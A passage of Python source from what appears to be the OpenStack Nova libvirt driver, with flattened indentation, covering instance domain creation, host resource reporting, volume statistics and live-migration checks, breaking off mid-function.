def _create_domain_and_network(self, context, xml, instance, network_info,
block_device_info=None, power_on=True,
reboot=False, vifs_already_plugged=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
conf = self._connect_volume(connection_info, disk_info)
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
vol['connection_info'] = connection_info
vol.save(context)
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
timeout = CONF.vif_plugging_timeout
if (self._conn_supports_start_paused and
utils.is_neutron() and not
vifs_already_plugged and power_on and timeout):
events = self._get_neutron_events(network_info)
else:
events = []
launch_flags = events and libvirt.VIR_DOMAIN_START_PAUSED or 0
domain = None
try:
with self.virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance,
network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
domain = self._create_domain(
xml, instance=instance,
launch_flags=launch_flags,
power_on=power_on)
self.firewall_driver.apply_instance_filter(instance,
network_info)
except exception.VirtualInterfaceCreateException:
# Neutron reported failure and we didn't swallow it, so
# bail here
with excutils.save_and_reraise_exception():
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
except eventlet.timeout.Timeout:
# We never heard from Neutron
LOG.warn(_LW('Timeout waiting for vif plugging callback for '
'instance %(uuid)s'), {'uuid': instance['uuid']})
if CONF.vif_plugging_is_fatal:
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
raise exception.VirtualInterfaceCreateException()
# Resume only if domain has been paused
if launch_flags & libvirt.VIR_DOMAIN_START_PAUSED:
domain.resume()
return domain
def _get_all_block_devices(self):
"""Return all block devices in use on this node."""
devices = []
for dom in self._list_instance_domains():
try:
doc = etree.fromstring(dom.XMLDesc(0))
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the XML from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def _get_interfaces(self, xml):
"""Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_LW("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = hardware.get_vcpu_pin_set()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def _get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def _get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt.images_type == 'lvm':
info = lvm.get_volume_group_info(
CONF.libvirt.images_volume_group)
elif CONF.libvirt.images_type == 'rbd':
info = LibvirtDriver._get_rbd_driver().get_pool_info()
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / units.Gi
return info
def _get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu(s) that are currently being used.
"""
total = 0
if CONF.libvirt.virt_type == 'lxc':
return total + 1
for dom in self._list_instance_domains():
try:
vcpus = dom.vcpus()
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the vpu count from domain id:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
else:
if vcpus is not None and len(vcpus) > 1:
total += len(vcpus[1])
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return total
def _get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self._list_instance_domains(only_guests=False):
try:
dom_mem = int(dom.info()[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self._get_memory_mb_total() - avail / units.Ki
def _get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def _get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def _get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def _get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self._get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def _get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self._get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
An assignable PCI device can be a normal PCI device,
a SR-IOV Physical Function (PF), or a SR-IOV Virtual
Function (VF). Only normal PCI devices or SR-IOV VFs
are assignable, while SR-IOV PFs are always owned by
hypervisor.
Please notice that a PCI device with SR-IOV
capability but not enabled is reported as normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
phys_address = "%s:%s:%s.%s" % (
fun_cap.device_addrs[0][0].replace("0x", ''),
fun_cap.device_addrs[0][1].replace("0x", ''),
fun_cap.device_addrs[0][2].replace("0x", ''),
fun_cap.device_addrs[0][3].replace("0x", ''))
return {'dev_type': 'type-VF',
'phys_function': phys_address}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
# requirement by DataBase Model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def _get_pci_passthrough_devices(self):
"""Get host PCI devices information.
Obtains pci devices information from libvirt, and returns
as a JSON string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
Refer to the objects/pci_device.py for more idea of these keys.
:returns: a JSON string containaing a list of the assignable PCI
devices information
"""
# Bail early if we know we can't support `listDevices` to avoid
# repeated warnings within a periodic task
if not getattr(self, '_list_devices_supported', True):
return jsonutils.dumps([])
try:
dev_names = self._conn.listDevices('pci', 0) or []
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
self._list_devices_supported = False
LOG.warn(_LW("URI %(uri)s does not support "
"listDevices: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
return jsonutils.dumps([])
else:
raise
pci_info = []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug("Trying to get stats for the volume %s",
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
"Got volume usage stats for the volume=%(volume)s,"
" rd_req=%(rd_req)d, rd_bytes=%(rd_bytes)d, "
"wr_req=%(wr_req)d, wr_bytes=%(wr_bytes)d",
stats, instance=instance)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk_id):
"""Note that this function takes an instance name."""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk_id)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_LI('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk_id,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_LI('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, iface_id):
"""Note that this function takes an instance name."""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(iface_id)
def get_console_pool_info(self, console_type):
# TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.",
tmp_file, instance=instance)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * units.Ki) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"image_type": CONF.libvirt.images_type,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
dest_check_data.update({'is_shared_block_storage':
self._is_shared_block_storage(instance, dest_check_data)})
dest_check_data.update({'is_shared_instance_path':
self._is_shared_instance_path(dest_check_data)})
if dest_check_data['block_migration']:
if (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _is_shared_block_storage(self, instance, dest_check_data):
"""Check if all block storage of an instance can be shared
between source and destination of a live migration.
Returns true if the instance is volume backed and has no local disks,
or if the image backend is the same on source and destination and the
backend shares block storage between compute nodes.
"""
if (CONF.libvirt.images_type == dest_check_data.get('image_type') and
self.image_backend.backend().is_shared_block_storage()):
return True
if (dest_check_data.get('is_volume_backed') and
not bool(jsonutils.loads(
self.get_instance_disk_info(instance['name'])))):
# pylint: disable E1120
return True
return False
def _is_shared_instance_path(self, dest_check_data):
"""Check if instance path is shared between source and
destination of a live migration.
"""
return self._check_shared_storage_test_file(
dest_check_data["filename"])
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports qcow2 disk format,which is usually compressed
# on compute nodes.
# Real disk image (compressed) may enlarged to "virtual disk size",
# that is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * units.Mi
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string of cpu feature from _get_cpu_info()
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt.virt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_LI('Instance launched has CPU info: %s'), cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.", tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance.name)
greenthread.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _correct_listen_addr(self, old_xml_str, listen_addrs):
# NB(sross): can't just use LibvirtConfigGuest#parse_str
# here b/c it doesn't capture the entire XML
# description
xml_doc = etree.fromstring(old_xml_str)
# change over listen addresses
for dev in xml_doc.findall('./devices/graphics'):
gr_type = dev.get('type')
listen_tag = dev.find('listen')
if gr_type in ('vnc', 'spice'):
if listen_tag is not None:
listen_tag.set('address', listen_addrs[gr_type])
if dev.get('listen') is not None:
dev.set('listen', listen_addrs[gr_type])
return etree.tostring(xml_doc)
def _check_graphics_addresses_can_live_migrate(self, listen_addrs):
LOCAL_ADDRS = ('0.0.0.0', '127.0.0.1', '::', '::1')
local_vnc = CONF.vncserver_listen in LOCAL_ADDRS
local_spice = CONF.spice.server_listen in LOCAL_ADDRS
if ((CONF.vnc_enabled and not local_vnc) or
(CONF.spice.enabled and not local_spice)):
raise exception.MigrationError(
_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag or your'
' destination node does not support'
' retrieving listen addresses. In order'
' for live migration to work properly, you'
' must configure the graphics (VNC and/or'
' SPICE) listen addresses to be either'
' the catch-all address (0.0.0.0 or ::) or'
' the local address (127.0.0.1 or ::1).'))
if listen_addrs is not None:
dest_local_vnc = listen_addrs['vnc'] in LOCAL_ADDRS
dest_local_spice = listen_addrs['spice'] in LOCAL_ADDRS
if ((CONF.vnc_enabled and not dest_local_vnc) or
(CONF.spice.enabled and not dest_local_spice)):
LOG.warn(_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag, and the '
' graphics (VNC and/or SPICE) listen'
' addresses on the destination node do not'
' match the addresses on the source node.'
' Since the source node has listen'
' addresses set to either the catch-all'
' address (0.0.0.0 or ::) or the local'
' address (127.0.0.1 or ::1), the live'
' migration will succeed, but the VM will'
' continue to listen on the current'
' addresses.'))
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.libvirt.block_migration_flag.split(',')
else:
flaglist = CONF.libvirt.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
pre_live_migrate_data = (migrate_data or {}).get(
'pre_live_migration_result', {})
listen_addrs = pre_live_migrate_data.get('graphics_listen_addrs')
migratable_flag = getattr(libvirt, 'VIR_DOMAIN_XML_MIGRATABLE',
None)
if migratable_flag is None or listen_addrs is None:
self._check_graphics_addresses_can_live_migrate(listen_addrs)
dom.migrateToURI(CONF.libvirt.live_migration_uri % dest,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
else:
old_xml_str = dom.XMLDesc(migratable_flag)
new_xml_str = self._correct_listen_addr(old_xml_str,
listen_addrs)
dom.migrateToURI2(CONF.libvirt.live_migration_uri % dest,
None,
new_xml_str,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_block_storage = True
is_shared_instance_path = True
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', True)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', True)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not (is_shared_instance_path and is_shared_block_storage):
# NOTE(mikal): live migration of instances using config drive is
# not supported because of a bug in libvirt (read only devices
# are not copied by libvirt). See bug/1246201
if configdrive.required_by(instance):
raise exception.NoLiveMigrationForConfigDriveInLibVirt()
if not is_shared_instance_path:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if not is_shared_block_storage:
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance,
instance_dir, disk_info)
if not (is_block_migration or is_shared_instance_path):
# NOTE(angdraug): when block storage is shared between source and
# destination and instance path isn't (e.g. volume backed or rbd
# backed instance), instance path on destination has to be prepared
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
self._connect_volume(connection_info, disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retry operation is necessary because continuously request comes,
# concurrent request occurs to iptables, then it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_LW('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
res_data = {'graphics_listen_addrs': {}}
res_data['graphics_listen_addrs']['vnc'] = CONF.vncserver_listen
res_data['graphics_listen_addrs']['spice'] = CONF.spice.server_listen
return res_data
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
""":param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:param disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['virt_disk_size'])
elif info['backing_file']:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt.images_type)
if cache_name.startswith('ephemeral'):
image.cache(fetch_func=self._create_ephemeral,
fs_label=cache_name,
os_type=instance["os_type"],
filename=cache_name,
size=info['virt_disk_size'],
ephemeral_size=instance['ephemeral_gb'])
elif cache_name.startswith('swap'):
inst_type = flavors.extract_flavor(instance)
